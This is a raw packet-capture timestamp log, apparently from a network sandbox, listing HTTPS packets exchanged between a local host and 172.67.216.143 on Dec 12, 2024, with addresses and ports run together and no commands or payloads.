                                          Dec 12, 2024 07:54:11.791054010 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.846515894 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.911027908 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.911434889 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.911462069 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.911509037 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:11.911530018 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:11.911638021 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.030237913 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.030673027 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.030746937 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.030770063 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.080884933 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.150067091 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.150509119 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.150567055 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.150571108 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.150587082 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.150638103 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.151365995 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.152386904 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.152447939 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.152456999 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.153985023 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.154006958 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.154051065 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.154062033 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.154118061 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.154640913 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.157257080 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.157264948 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.157326937 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.157335043 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.158572912 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.158663034 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.158669949 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.158726931 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.159717083 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.160470963 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.160542965 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.160550117 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.160600901 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.162328005 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.162395000 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.163052082 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.163121939 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.164954901 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.165018082 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.270420074 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.270683050 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.279902935 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.280142069 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.295274019 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.295424938 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.303225994 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.303338051 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.312530041 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.312771082 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.322174072 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.322266102 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.326987982 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.327197075 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.336806059 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.337016106 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.345865011 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.346035957 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.350831985 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.351044893 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.360183001 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.360347986 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.369790077 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.369874001 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.376796961 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.376935005 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.386372089 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.386588097 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.391462088 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.391668081 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.400882959 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.401045084 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.410190105 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.410383940 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.415345907 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.416405916 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.424556017 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.424678087 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.434329987 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.434412003 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.438973904 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.439095974 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.448510885 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.448623896 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.457837105 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.458005905 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.467370033 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.467503071 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.474504948 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.474709034 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.479701996 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.479767084 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.488313913 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.488440990 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.496563911 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.496660948 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.500847101 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.500922918 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.508255005 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.508533001 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.515331030 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.515479088 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.522303104 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.522427082 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.525933981 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.526066065 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.530869007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.530951977 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.542650938 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.542675018 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.542735100 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.542790890 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.542810917 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.542845964 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.543389082 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.553181887 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.553205013 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.553395987 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.553395987 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.553415060 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.557110071 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.565054893 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.565076113 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.565460920 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.565474033 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.565880060 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.575908899 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.575926065 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.576141119 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.576153040 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.576478004 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.587477922 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.587495089 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.588040113 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.588053942 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.588311911 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.599155903 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.599180937 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.599280119 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.599293947 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.599334955 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.599565029 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.604196072 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.604363918 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.604377985 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.609272003 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.609589100 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.609597921 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.623615980 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.623639107 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.623797894 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.623811007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.636298895 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.636317015 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.636466980 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.636478901 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.642262936 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.642399073 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.642410994 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.651956081 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.651973009 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652009964 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652059078 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.652072906 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.652123928 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.662050009 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662065983 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662103891 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662194967 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.662206888 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.662240028 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.670572042 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670588017 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670624971 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.670671940 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.670686007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.671042919 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.718714952 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718736887 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718812943 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718874931 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.718892097 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.718933105 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.723995924 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724004984 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724046946 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724085093 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724107027 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724143982 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724153996 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724153996 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724170923 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.724198103 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.724267006 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729254007 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729304075 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729325056 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729360104 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729417086 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729429960 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.729439974 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.729439974 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.730155945 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.730287075 CET44349699172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:12.730330944 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.730866909 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:12.733778000 CET49699443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.833339930 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.833381891 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:50.833882093 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.852693081 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:50.852709055 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.078533888 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.079057932 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.150836945 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.150847912 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.151333094 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.151422024 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.156208992 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.199327946 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.755817890 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.755978107 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.755990028 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.756036997 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.756259918 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.756347895 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.756978989 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.757066011 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.757071972 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.757158041 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.764403105 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.764470100 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.764487982 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.764596939 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.774529934 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.774838924 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.778860092 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.778996944 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.779005051 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.779195070 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.875150919 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.875267982 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.875286102 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.875447035 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.879400015 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.879467010 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.949395895 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.949516058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.953383923 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.953444004 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.953510046 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.953577042 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.961688042 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.961740971 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.961838961 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.961885929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.970047951 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.970148087 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.970261097 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.970307112 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.978616953 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.978718996 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.986622095 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.986716032 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.987159014 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.987258911 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.994916916 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.995038033 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:52.995052099 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:52.995172977 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.003289938 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.003367901 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.003572941 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.003662109 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.011754036 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.011924982 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.018080950 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.018142939 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.018229008 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.018381119 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.024199963 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.024279118 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.024394035 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.024440050 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.030450106 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.030587912 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.030846119 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.030934095 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.036652088 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.036746025 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.042798996 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.042884111 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.043179035 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.043219090 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.141472101 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.141603947 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.143781900 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.143838882 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.143970966 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.144048929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.148669958 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.148817062 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.148849964 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.148958921 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.158130884 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.158277035 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.167166948 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.167325974 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.167336941 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.167490959 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.175555944 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.175674915 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.183689117 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.183768034 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.188235998 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.188328981 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.196171045 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.196238041 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.204282999 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.204427004 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.212373018 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.212516069 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.333865881 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.335062027 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.338661909 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.338772058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.342082977 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.342473984 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.348764896 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.348917007 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.355092049 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.355185986 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.361705065 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.361815929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.365143061 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.365228891 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.371712923 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.371917963 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.378161907 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.378314018 CET49776443192.168.2.7172.67.216.143
